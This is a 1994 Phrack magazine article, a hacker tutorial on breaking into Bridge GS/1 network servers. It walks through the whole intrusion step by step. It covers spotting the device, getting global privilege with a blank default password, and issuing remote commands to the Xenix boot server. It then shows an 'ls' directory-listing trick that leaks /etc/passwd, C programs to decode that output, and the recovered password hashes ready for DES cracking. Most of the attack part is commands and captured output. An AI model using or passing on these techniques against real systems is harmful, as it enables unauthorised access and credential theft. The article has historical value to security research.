[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]


..[ Phrack Magazine ]..
.:: Gettin' Down 'N Dirty Wit Da GS/1 ::.

Issues: [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ] [ 18 ] [ 19 ] [ 20 ] [ 21 ] [ 22 ] [ 23 ] [ 24 ] [ 25 ] [ 26 ] [ 27 ] [ 28 ] [ 29 ] [ 30 ] [ 31 ] [ 32 ] [ 33 ] [ 34 ] [ 35 ] [ 36 ] [ 37 ] [ 38 ] [ 39 ] [ 40 ] [ 41 ] [ 42 ] [ 43 ] [ 44 ] [ 45 ] [ 46 ] [ 47 ] [ 48 ] [ 49 ] [ 50 ] [ 51 ] [ 52 ] [ 53 ] [ 54 ] [ 55 ] [ 56 ] [ 57 ] [ 58 ] [ 59 ] [ 60 ] [ 61 ] [ 62 ] [ 63 ] [ 64 ] [ 65 ] [ 66 ] [ 67 ] [ 68 ] [ 69 ] [ 70 ] [ 71 ]
Current issue : #46 | Release date : 1994-09-20 | Editor : Erik Bloodaxe
IntroductionErik Bloodaxe
Phrack LoopbackPhrack Staff
Line NoisePhrack Staff
Line NoisePhrack Staff
Phrack Prophile on Minor ThreatMinor Threat
Paid Advertisementunknown
Paid Advertisement (cont)unknown
The Wonderful World of PagersErik Bloodaxe
Legal Info by Szechuan DeathSzechuan Death
A Guide to Porno BoxesCarl Corey
Unix Hacking - Tools of the TradeThe Shining
The fingerd Trojan HorseHitman Italy
The Phrack University Dialup ListPhrack Staff
A Little About DialcomHerd Beast
VisaNet Operations Part IIce Jey
VisaNet Operations Part IIIce Jey
Gettin' Down 'N Dirty Wit Da GS/1Dr. Delam & Maldoror
StartalkThe Red Skull
Cyber Christ Meets Lady Luck Part IWinn Schwartau
Cyber Christ Meets Lady Luck Part IIWinn Schwartau
The Groom Lake Desert RatPsychoSpy
HOPEErik Bloodaxe
Cyber Christ Bites the Big AppleWinn Schwartau
The ABCs of Better Hotel StayingSeven Up
AT&T Definity System 75/85Erudite
Keytrap v1.0 Keyboard Key LoggerDcypher
International Scenesvarious
Phrack World NewsDatastream Cowboy
Title : Gettin' Down 'N Dirty Wit Da GS/1
Author : Dr. Delam & Maldoror
                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 17 of 28

****************************************************************************

[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
[<>                                                                     <>]
[<>   ----+++===:::  GETTiN' D0wN 'N D1RTy wiT Da GS/1  :::===+++----   <>]
[<>                                                                     <>]
[<> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <>]
[<>                                                                     <>]
[<>                        Brought to you by:                           <>]
[<>        [)elam0 Labz, Inc. and ChURcH oF ThE Non-CoNForMisT          <>]
[<>                                                                     <>]
[<>        Story line: Maldoror -n- [)r. [)elam                         <>]
[<>        Main Characters: Menacing Maldoror & The Evil [)r. [)elam    <>]
[<>        Unix Technical Expertise: Wunder-Boy [)elam                  <>]
[<>        Sysco Technishun: Marvelous Maldoror                         <>]
[<>                                                                     <>]
[<>        Look for other fine [)elamo Labz and ChURcH oF ThE           <>]
[<>        Non-CoNForMisT products already on the market such as        <>]
[<>        DEPL (Delam's Elite Password Leecher), NUIA (Maldoror's      <>]
[<>        Tymnet NUI Attacker), TNET.SLT (Delam's cheap0 Telenet       <>]
[<>        skanner for Telix), PREFIX (Maldoror's telephone prefix      <>]
[<>        identification program), and various other programs and      <>]
[<>        philez written by Dr. Delam, Maldoror, Green Paradox,        <>]
[<>        El Penga, Hellpop, and other certified DLI and CNC members.  <>]
[<>                                                                     <>]
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]

                               Index
              ========================================

              1. Finding and identifying a GS/1
              2. Getting help
              3. Gaining top privilege access
              4. Finding the boot server
              5. Connecting to the boot server
              6. Getting the boot server password file
              7. Other avenues


----------------------------------------------------------------------------


Here's hacking a GS/1 made EZ (for the sophisticated hacker)  It is
advisable to fill your stein with Sysco and pay close attention... if
Sysco is not available in your area, Hacker Pschorr beer will work
almost as good... (especially Oktoberfest variety)


What is a GS/1?
---------------
A GS/1 allows a user to connect to various other computers... in other
words, it's a server, like a DEC or Xyplex.


So why hack it?
---------------
Cuz itz there... and plus you kan access all sortz of net stuph fer
phree. (QSD @ 208057040540 is lame and if you connect to it, you're
wasting the GS/1.. the French fone police will fly over to your country
and hunt you down like a wild pack of dogs, then hang you by your own
twisted pair.)


What to do:
-----------



               +--------------------------------------+
               +  #1. Finding and identifying a GS/1  +
               +--------------------------------------+

Find a GS/1 .. they're EZ to identify.. they usually have a prompt of
GS/1, though the prompt can be set to whatever you want it to be.  A
few years ago there were quite a number of GS/1's laying around on
Tymnet and Telenet... you can still find a few if you scan the right
DNIC's.  (If you don't know what the hell I'm talking about, look at
some old Phracks and LOD tech. journals.)

The prompt will look similar to this:

(!2) GS/1>

(The (!2) refers to the port you are on)



                        +--------------------+
                        +  #2. Getting help  +
                        +--------------------+

First try typing a '?' to display help items.

A help listing looks like this:

> (!2) GS/1>?
>       Connect     <address>[,<address>] [ ECM ] [ Q ]
>       DO          <macro-name>
>       Echo        <string>
>       Listen
>       Pause       [<seconds>]
>       PIng        <address> [ timeout ]
>       SET         <param-name> = <value> ...
>       SHow        <argument> ...

At higher privileges such as global (mentioned next) the help will
look like this (note the difference in the GS/1 prompt with a # sign):

> (!2) GS/1# ?
>       BRoadcast   ( <address> ) <string>
>       Connect     ( <address> ) <address>[,<address>] [ ECM ] [ Q ]
>       DEFine      <macro-name> = ( <text> )
>       DisConnect  ( <address> ) [<session number>]
>       DO          ( <address> ) <macro-name>
>       Echo        <string>
>       Listen      ( <address> )
>       Pause       [<seconds>]
>       PIng        <address> [ timeout ]
>       ReaD        ( <address> ) <option> <parameter>
>       REMOTE      <address>
>       ROtary      ( <address> ) !<rotary> [+|-]= !<portid>[-!<portid>] , ...
>       SAve        ( <address> ) <option> <filename>
>       SET         ( <address> ) <param-name> = <value> ...
>       SETDefault  ( <address> ) [<param-name> = <value>] ...
>       SHow        ( <address> ) <argument> ...
>       UNDefine    ( <address> ) <macro-name>
>       UNSave      ( <address> ) <filename>
>       ZeroMacros  ( <address> )
>       ZeroStats   ( <address> )

Additional commands under global privilege are: BRoadcast, DEFine,
DisConnect, ReaD, REMOTE, ROtary, UNDefine, UNSave, ZeroMacros,
ZeroStats, and a few extra options under the normal user commands.

If you need in-depth help for any of the commands, you can again use the
'?' in the following fashion:

> (!2) GS/1>sho ?
>       SHow    ADDRess
>       SHow    ClearingHouseNames [ <name> [ @ <domain> [@ <organ.> ] ] ]
>       SHow    DefaultParameters [<param-name> ...]
>       SHow    GLobalPARameters
>       SHow    NetMAP [ Short | Long ]
>       SHow    PARAmeterS [<param-name> ...]
>       SHow    <param-name> ...
>       SHow    SESsions [ P ]
>       SHow    VERSion

> (!2) GS/1>sh add?
>       SHow    ADDRess

> (!2) GS/1>sh add
> ADDRess = &000023B5%07000201E1D7!2

"sh add" displays your own network, address and port number.

The network is 000023B5
The address is 07000201E1D7
The port number is 2



                   +------------------------------------+
                   +  #3. Gaining top privilege access  +
                   +------------------------------------+

Figure out the global password.

Do a "set priv=global" command.

   Note:
   ----
   There are 3 states to set priv to: user, local, and global.  Global is
   the state with the most privilege.  When you attain global privilege,
   your prompt will change to have a '#' sign at the end of it.. this means
   you have top priceless (similar to *nix's super user prompt).

The GS/1 will prompt you for a password.  The default password on GS/1's
is to have no password at all... The GS/1  will still prompt you for a
password, but you can enter anything at this point if the password was
never set.



                  +-------------------------------+
                  +  #4. Finding the boot server  +
                  +-------------------------------+

Figure out the boot server address available from this GS/1 ..

The boot server is what lies under the GS/1.  We've found that GS/1's are
actually run on a Xenix operating system.. (which is of course a nice
phamiliar territory)  It's debatable whether all GS/1's are run on Xenix or
not as we have yet to contact the company.  (We may put out a 2nd file going
into more detail.)

Do a "sh b" or "sh global" as shown in the following examples:

> (!2) GS/1# sh b
> BAud = 9600         BootServerAddress = &00000000%070002017781
> BReakAction = ( FlushVC, InBand )       BReakChar = Disabled
> BSDelay = None      BUffersize = 82

> (!2) GS/1# sh global
> ...............................Global Parameters............................
> DATE = Wed Jun 22 21:16:45 1994         TimeZone = 480 minutes
> DaylightSavingsTime = 0 minutes         LogoffStr = "L8r laM3r"
> WelcomeString = "Welcome to your haqued server (!2), Connected to "
> DOmain = "thelabz"                      Organization = "delam0"
> PROmpt = "GS/1>"                        NMPrompt = "GS/1# "
> LocalPassWord = ""                      GlobalPassWord = "haque-me"
> NetMapBroadcast = ON                    MacType = EtherNET
> CONNectAudit = ON                       ERRorAudit = ON
> AUditServerAddress = &000031A4%07000200A3D4
> AUditTrailType = Local
> BootServerAddress = &00000000%070002017781

Side note: the GlobalPassWord is "haque-me" whereas the LocalPassWord is ""
... these are the actual passwords that need to be entered (or in the case
of the LocalPassWord, "" matches any string).  You'll only be able to
"sh global" after a successful "set priv=global".

Now that you have the boot server address, the next step is enabling
communication to the boot server.



              +-------------------------------------+
              +  #5. Connecting to the boot server  +
              +-------------------------------------+

Do a REMOTE <address> where address is the address of the machine you
want to issue remote commands to.

> (!2) GS/1# REMOTE %070002017781
> (!2) Remote: ?
>       BInd        <address> [-f <bootfile>] [-l <loader>] [<nports>]
>       BRoadcast   ( <address> ) "<string>"
>       CoPyfile    [<address>:]<pathname> [<address>:][<pathname>]
>       LiSt        [ -ls1CR ] [<pathname> ...]
>       MoVe        <pathname> <pathname>
>       NAme        <clearinghouse name> = <address>[,<address>]...
>       Ping        <address> [timeout]
>       ReMove      <pathname> ...
>       SET         [( <address> )] <param-name> = <value> ...
>       SETDefault  <param-name> = <value> ...
>       SHow        <argument>
>       UNBind      <address>
>       UNDefine    <macro name>
>       UNName      <name>
>       ZeroStats
>       <BREAK>     (to leave remote mode)

Your prompt changes from "(!2) GS/1# " to "(!2) Remote: "... this means
you will be issuing commands to whatever remote machine you specified
by the REMOTE <address> command.

Notice for this case, the boot server's address was used.

When you get the REMOTE: prompt, you can issue commands that will be
executed on the remote machine.  Try doing a '?' to see if it's another
GS/1.. if not, try doing 'ls' to see if you have a *nix type machine.

Also notice that the help commands on the remote are not the same as
those for the GS/1 (though, if you establish a remote link with another
GS/1 they will be the same).

> (!2) Remote: ls -l
> total 1174
> drwxrwxrwx   2 ncs      ncs          160 Aug 17  1989 AC
> drwxrwxrwx   2 ncs      ncs         5920 Jun  5 00:00 AUDIT_TRAIL
> drwxrwxrwx   2 ncs      ncs           96 Jun  5 01:00 BACKUP
> drwxrwxrwx   2 ncs      ncs          240 Jun  4 04:42 BIN
> drwxrwxrwx   2 ncs      ncs          192 Jun  4 04:13 CONFIGS
> drwxrwxrwx   2 ncs      ncs           64 Aug 17  1989 DUMP
> drwxrwxrwx   2 ncs      ncs           80 Aug 17  1989 ETC
> drwxrwxrwx   2 ncs      ncs          160 Jun  4 04:13 GLOBALS
> -rw-r--r--   1 ncs      ncs          228 Jun  5 00:59 btdata
> -rw-r--r--   1 ncs      ncs         8192 Jun  8  1993 chnames.dir
> -rw-r--r--   1 ncs      ncs        11264 Jun  1 13:41 chnames.pag
> drwxrwxrwx   2 ncs      ncs           48 Jun  5 00:00 dev
> drwx------   2 bin      bin         1024 Aug 17  1989 lost+found
> -rw-rw-rw-   1 ncs      ncs       557056 Mar 23  1992 macros
> -rw-r--r--   1 ncs      ncs          512 Oct 22  1993 passwd

Look familiar??  If not, go to the nearest convenient store and buy the
a 12 pack of the cheapest beer you can find.. leave your computer
connected so you hurry back, and slam eight or nine cold onez... then
look at the screen again.

You're basically doing a Remote Procedure Call for ls to your Xenix boot
server.

Notice at this point that the "passwd" is not owned by root.  This is
because this is not the system password file, and you are not in the
"/etc" directory... (yet)

There are a couple of problems:

> (!2) Remote: cat
> Invalid REMOTE command
>
> (!2) Remote: cd /etc
> Invalid REMOTE command

You cannot view files and you cannot change directories.

To solve the "cd" problem do the following:

> (!2) Remote: ls -l ..
> total 26
> drwxrwxrwx  12 root     root         352 Jun  5 00:59 NCS
> drwxr-xr-x   2 bin      bin          112 Aug 17  1989 adm
> drwxrwx---   2 sysinfo  sysinfo       48 Aug 17  1989 backup
> drwxr-xr-x   2 bin      bin         1552 Aug 17  1989 bin
> drwxr-xr-x  20 bin      bin          720 Aug 17  1989 lib
> drwxrwxrwx   6 ncs      ncs          224 Aug 17  1989 ncs
> drwxr-xr-x   2 bin      bin           32 Aug 17  1989 preserve
> drwxr-xr-x   2 bin      bin           64 Aug 17  1989 pub
> drwxr-xr-x   7 bin      bin          144 Aug 17  1989 spool
> drwxr-xr-x   9 bin      bin          144 Aug 17  1989 sys
> drwxr-x---   2 root     root          48 Aug 17  1989 sysadm
> drwxrwxrwx   2 bin      bin           48 Jun  5 01:00 tmp
>
> (!2) Remote: ls -l ../..
> total 1402
> -rw-r--r--   1 root     root        1605 Aug 17  1989 .login
> -r--r--r--   1 ncs      ncs         1605 Aug 28  1990 .login.ncs
> -rw-r--r--   1 root     root         653 Aug 17  1989 .logout
> -r--r--r--   1 ncs      ncs          653 Aug 28  1990 .logout.ncs
> -rw-------   1 root     root         427 Aug 17  1989 .profile
> drwxr-xr-x   2 bin      bin         2048 Aug 17  1989 bin
> -r--------   1 bin      bin        25526 May  4  1989 boot
> drwxr-xr-x   6 bin      bin         3776 Aug 17  1989 dev
> -r--------   1 bin      bin          577 Nov  3  1987 dos
> drwxr-xr-x   5 bin      bin         1904 Jun  2 12:40 etc
> drwxr-xr-x   2 bin      bin           64 Aug 17  1989 lib
> drwx------   2 bin      bin         1024 Aug 17  1989 lost+found
> drwxr-xr-x   2 bin      bin           32 Aug 17  1989 mnt
> drwxrwxrwx   2 bin      bin          512 Jun  5 01:20 tmp
> drwxr-xr-x  14 bin      bin          224 Aug 17  1989 usr
> -rw-r--r--   1 bin      bin       373107 Aug 17  1989 xenix
> -rw-r--r--   1 root     root      287702 Aug 17  1989 xenix.old

Your brain should now experience deja vous.. you just found the
root directory.  (for the non-*nix, lam0-hacker, the root directory
has key *nix directories such as /etc, /bin, /dev, /lib, etc. in it.)

Now you can get to /etc/passwd as follows:

> (!2) Remote: ls -l ../../etc
> total 1954
> -rwx--x--x   1 bin      bin         7110 May  8  1989 accton
> -rwx------   1 bin      bin         1943 May  8  1989 asktime
> -rwx------   1 bin      bin        31756 May  8  1989 badtrk
> -rw-rw-rw-   1 root     root        1200 Apr 24 12:40 bootlog
> -rwx--x--x   1 bin      bin        24726 May  8  1989 brand
> -rw-r--r--   1 bin      bin           17 Aug 17  1989 checklist
> -rw-r--r--   2 bin      bin           17 Aug 17  1989 checklist.last
> -rw-r--r--   1 ncs      ncs           17 Aug 28  1990 checklist.ncs
> -rw-r--r--   2 bin      bin           17 Aug 17  1989 checklist.orig
> -rwx------   1 bin      bin         2857 May  8  1989 chsh
> -rwx------   1 bin      bin         7550 May  8  1989 clri
> -rwx------   1 bin      bin         8034 May  8  1989 cmos
> -rwxr-xr-x   1 root     bin        31090 Aug 28  1990 cron
> -rw-r--r--   1 bin      bin          369 May  8  1989 cshrc
> ...... etc.
> -rw-r--r--   1 root     root         465 Mar  5  1991 passwd

Yeah, now what?!

You've found the /etc/passwd file, but you don't have "cat" to type the
file out.  Now you're stuck... so drink a half a bottle of Sysco per
person. (We did... and as you'll see, Sysco is the drink of a manly hackers
like us... make sure it's the big bottle kind not those girly small
onez.)



            +---------------------------------------------+
            +  #6. Getting the boot server password file  +
            +---------------------------------------------+

There is one way to get around the cat problem (no itz n0t puttin
catnip laced with somethin U made frum a phile on yer doorstep)
It's done using ls.  On this Xenix system, the directory structure is
the old Unix format: A 16 byte record comprised of a 2 byte I-number
and a 14 byte character field.

   Note about directory structure for the inquisitive hacker:
   In a directory record there is a 14 byte string containing the file
   name, and the 2 byte I-number (2 bytes = an integer in this case)
   which is a number that is an (I)ndex pointer to the I-node.  The
   I-node then contains the information about where the file's data is
   actually kept (similar to how a FAT table works on an IBM PC yet a
   different concept as it has indirect index blocks etc. I won't get
   into) and what permissions are set for the file.  Be warned that in
   newer *nix implementations, file names can be more than 14 characters
   and the directory structure will be a bit different than discussed.

The "ls" command has an option that allows you to tell it "this *file* is
a *directory*.. so show me what's in the directory"... newer *nix
systems won't like this (the -f option) because of the new directory
structure.

> (!2) Remote: ls -?
> ls: illegal option --?
> usage:  -1ACFRabcdfgilmnopqrstux [files]
>
> (!2) Remote: ls -1ACFRabcdfgilmnopqrstux ../../etc/passwd
> 28530 ot:BJlx/e8APHe   30580 :0:0:Super use   14962 /:/bin/csh?sys
> 25697 m:X/haSqFDwHz1   14929 0:0:System Adm   28265 istration:/usr
> 29487 ysadm:/bin/sh?   29283 on:NOLOGIN:1:1   17210 ron daemon for
> 28704 eriodic tasks:   14895 ?bin:NOLOGIN:3   13114 :System file a
> 28004 inistration:/:   29962 ucp::4:4:Uucp    25697 ministration:/
> 29557 r/spool/uucppu   27746 ic:/usr/lib/uu   28771 /uucico?asg:NO
> 20300 GIN:6:6:Assign   25185 le device admi   26990 stration:/:?sy
> 26995 nfo:NOLOGIN:10   12602 0:Access to sy   29811 em information
> 12090 :?network:NOLO   18759 N:12:12:Mail a   25710  Network admin
> 29545 tration:/usr/s   28528 ol/micnet:?lp:   20302 LOGIN:14:3:Pri
> 29806  spooler admin   29545 tration:/usr/s   28528 ol/lp:?dos:NOL
> 18255 IN:16:10:Acces    8307 to Dos devices   12090 :?ncs:yYNFnHnL
> 22327 xcU:100:100:NC    8275 operator:/usr/
>
> (!2) Remote: <BRK>
> (!2) GS/1#

Wow, kewl.  Now that you have a bunch-o-shit on your screen, you have
to make some sense out of it.

The password file is almost legible, but the I-numbers still need to be
converted to ASCII characters.  This can be accomplished in a variety of
ways... the easiest is to write a program like the following in C:

On a PC the following code should work:

#include <stdio.h>
main()
{
   union {
      int i;
      char c[2];
   } x;
   while (1) {
      printf("Enter I-Number: ");
      scanf("%d", &x.i);
      printf("%d = [%c][%c]\n\n", x.i, x.c[0], x.c[1]);
   }
}

On a *nix based system the following code will work (depending on
word size and byte arrangement):

#include <stdio.h>
main()
{
   union {
      short int i;
      char c[2];
   } x;
   while (1) {
      printf("Enter I-Number: ");
      scanf("%hd", &x.i);
      printf("%d = [%c][%c]\n\n", x.i, x.c[1], x.c[0]);
   }
}


When you have translated the I-numbers you can substitute the ASCII
values by hand (or write a d0p3 program to do it for you):

28530 ot:BJlx/e8APHe   30580 :0:0:Super use   14962 /:/bin/csh?sys
28530 = [r][o]         30580 = [t][w]         14962 = [r][:]
root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys

25697 m:X/haSqFDwHz1   14929 0:0:System Adm   28265 istration:/usr
25697 = [a][d]         14929 = [Q][:]         28265 = [i][n]
adm:X/haSqFDwHz1Q:0:0:System Administration:/usr

29487 ysadm:/bin/sh?   29283 on:NOLOGIN:1:1   17210 ron daemon for
29487 = [/][s]         29283 = [c][r]         17210 = [:][C]
/sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for

28704 eriodic tasks:   14895 ?bin:NOLOGIN:3   13114 :System file a
28704 = [ ][p]         14895 = [/][:]         13114 = [:][3]
 periodic tasks:/:?bin:NOLOGIN:3:3:System file a

28004 inistration:/:   29962 ucp::4:4:Uucp    25697 ministration:/
28004 = [d][m]         29962 = [^M][u]        25697 = [a][d]
dministration:/:
uucp::4:4:Uucp administration:/

29557 r/spool/uucppu   27746 ic:/usr/lib/uu   28771 /uucico?asg:NO
29557 = [u][s]         27746 = [b][l]         28771 = [c][p]
usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO

20300 GIN:6:6:Assign   25185 le device admi   26990 stration:/:?sy
20300 = [L][O]         25185 = [a][b]         26990 = [n][i]
LOGIN:6:6:Assignable device administration:/:?sy

26995 nfo:NOLOGIN:10   12602 0:Access to sy   29811 em information
26995 = [s][i]         12602 = [:][1]         29811 = [s][t]
sinfo:NOLOGIN:10:10:Access to system information

12090 :?network:NOLO   18759 N:12:12:Mail a   25710  Network admin
12090 = [:][/]         18759 = [G][I]         25710 = [n][d]
:/:?network:NOLOGIN:12:12:Mail and Network admin

29545 tration:/usr/s   28528 ol/micnet:?lp:   20302 LOGIN:14:3:Pri
29545 = [i][s]         28528 = [p][o]         20302 = [N][O]
istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri

29806  spooler admin   29545 tration:/usr/s   28528 ol/lp:?dos:NOL
29806 = [n][t]         29545 = [i][s]         28528 = [p][o]
nt spooler administration:/usr/spool/lp:?dos:NOL

18255 IN:16:10:Acces    8307 to Dos devices   12090 :?ncs:yYNFmHnL
18255 = [O][G]          8307 = [s][ ]         12090 = [:][/]
OGIN:16:10:Access to Dos devices:/:?ncs:yYNFnHnL

22327 xcU:100:100:NC    8275 operator:/usr/
22327 = [7][W]          8275 = [S][ ]
7WxcU:100:100:NCS operator:/usr


The resulting file will look like the following:

root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys
adm:X/haSqFDwHz1Q:0:0:System Administration:/usr
/sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for
 periodic tasks:/:?bin:NOLOGIN:3:3:System file a
dministration:/:
uucp::4:4:Uucp administration:/
usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO
LOGIN:6:6:Assignable device administration:/:?sy
sinfo:NOLOGIN:10:10:Access to system information
:/:?network:NOLOGIN:12:12:Mail and Network admin
istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri
nt spooler administration:/usr/spool/lp:?dos:NOL
OGIN:16:10:Access to Dos devices:/:?ncs:yYNFmHnL
7WxcU:100:100:NCS operator:/usr

Because the ls command cannot display "non-printable" characters such
as the carriage return, it will replace them with a '?' character...
delete the '?' characters and divide by line at these locations.  When
you finish doing that, you'll have a standard /etc/passwd file:

root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh
sysadm:X/haSqFDwHz1Q:0:0:System Administration:/usr/sysadm:/bin/sh
cron:NOLOGIN:1:1:Cron daemon for periodic tasks:/:
bin:NOLOGIN:3:3:System file administration:/:
uucp::4:4:Uucp administration:/usr/spool/uucppublic:/usr/lib/uucp/uucico
asg:NOLOGIN:6:6:Assignable device administration:/:
sysinfo:NOLOGIN:10:10:Access to system information:/:
network:NOLOGIN:12:12:Mail and Network administration:/usr/spool/micnet:
lp:NOLOGIN:14:3:Print spooler administration:/usr/spool/lp:
dos:NOLOGIN:16:10:Access to Dos devices:/:
ncs:yYNFmHnL7WxcU:100:100:NCS operator:/usr

Once you've assembled your password file in a standard ASCII form,
you'll of course want to crack it with one of the many available DES
cracking programs.

+---------------------+
+  #7: Other Avenues  +
+---------------------+

Find out what else you can play with by first finding what networks are
available other than your own, and second, find out what machines are on
your network:

>(!2) GS/1# sh att
>                               Attached Networks
>&000023B5
>(!2) GS/1# sh nmap l
>                             NETWORK &000023B5 MAP
>
>  1-%070002017781 SW/AT-NCS       3.0.2  2-%070002A049C5 SW/NB-BR-3.1.1.1
>  3-%0700020269A7 SW/200-A/BSC/SDL22000  4-%07000201C089 SW/200-A/BSC/SDL22020
>  5-%070002023644 SW/200-A/BSC/SDL22020  6-%0700020138B2 SW/AT-NCS       2.1.1
>  7-%070002010855 SW/100-A/BSC    20060  8-%070002018BA2 SW/20-XNS-X.25  .0.2
> .... etc.

The boot server address, from previous examples, is number 1
which contains a description "SW/AT-NCS".  Examining the rest of the
list, number 6 has the same description.  System 12 may be just another
address for the boot server or it may be a different Xenix... but it should
be Xenix whatever it is.

We have refrained from covering the typical GS/1 information that has been
published by others; and instead, covered newer concepts in GS/1 hacking.
This phile is not a complete guide to GS/1 hacking; but expect successive
publications on the topic.





 
[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]
© Copyleft 1985-2024, Phrack Magazine.